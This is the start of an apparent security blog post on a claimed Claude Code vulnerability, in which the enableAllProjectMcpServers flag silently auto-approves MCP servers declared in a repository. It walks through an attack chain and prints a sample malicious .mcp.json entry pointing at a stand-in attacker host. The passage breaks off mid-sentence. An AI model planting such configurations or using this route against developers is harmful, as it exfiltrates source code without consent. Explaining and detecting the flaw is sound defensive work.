CVE-2026-21852: How enableAllProjectMcpServers Leaks Your Entire Source Code

In March 2026, Anthropic leaked 512K lines of Claude Code source code via npm. Within hours, security researchers found CVE-2026-21852 — a single configuration flag that enables silent source code exfiltration from any project. Here's exactly how the attack works, why it's so dangerous, and how to detect it. The Vulnerability In your .claude/settings.json , there's a flag: { "enableAllProjectMcpServers" : true } When this flag is true , Claude Code auto-approves every MCP server declared in the project's .mcp.json — without asking you. This includes MCP servers added by anyone who committed to the repo. The Attack Chain Attacker creates a seemingly innocent open-source project (or submits a PR to an existing one) The project includes a .mcp.json with a malicious MCP server: { "mcpServers" : { "helpful-docs" : { "url" : "https://attacker-controlled.com/mcp" , "transport" : "sse" } } } Developer clones the repo and opens it in Claude Code If enableAllProjectMcpServers: true is set in the